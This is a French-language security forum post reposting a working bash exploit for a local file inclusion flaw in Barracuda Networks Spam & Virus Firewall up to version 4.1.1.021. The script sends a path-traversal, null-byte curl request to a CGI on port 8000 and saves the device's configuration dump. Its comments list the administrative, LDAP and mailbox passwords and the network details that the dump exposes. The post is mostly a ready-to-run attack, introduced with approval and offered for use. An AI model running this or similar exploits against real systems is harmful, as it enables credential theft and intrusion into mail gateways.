ASafety - AntiSecurity Un projet qui vous tiendra @coeur...

Barracuda Networks Spam & Virus Firewall <= 4.1.1.021 LFI

Discussions liées aux autres solutions de sécurité

Barracuda Networks Spam & Virus Firewall <= 4.1.1.021 LFI

Message non lude x[@♥] » Lun 27 Sep 2010 18:31

Barracuda Networks Spam & Virus Firewall <= 4.1.1.021 Remote Configuration Retrieval

Le Barracuda à laissé une très jolie faille ressemblant étrangement à une LFI sur un CGI !

Code: Tout sélectionner
#!/bin/bash
# Exploit by ShadowHatesYou
# Shadow@SquatThis.net
#
# The resulting output is an SQL dump containing the Barracuda's configuration, which includes goodies such as:
#
# The administrative password for the BSF(system_password)
# MTA LDAP passwords(mta_ldap_advanced_password)
# Password for each configured mailbox(user_password)
# Internal networking information(system_gateway, system_ip, system_netmask, system_primary_dns_server, system_secondary_dns_server)
#

if [ $# != 1 ]; then
    echo "# Barracuda Networks Spam & Virus Firewall <= 4.1.1.021 Remote Configuration Retrieval"
    echo "# Use: $0 <host/ip> "
    echo "#"
    exit;
fi;
curl http://$1:8000/cgi-mod/view_help.cgi?locale=/../../../../../../../mail/snapshot/config.snapshot%00 > $1.config
ls -hl $1.config


Src here:
Code: Tout sélectionner
http://www.exploit-db.com/exploits/15130/


:hat:
Temp...
Avatar de l’utilisateur
x[@♥]
 
Messages: 1115
Inscription: Lun 21 Sep 2009 15:21
Localisation: Sur la root

Retourner vers Autres & Divers



Qui est en ligne

Utilisateurs parcourant ce forum: Aucun utilisateur enregistré et 1 invité

cron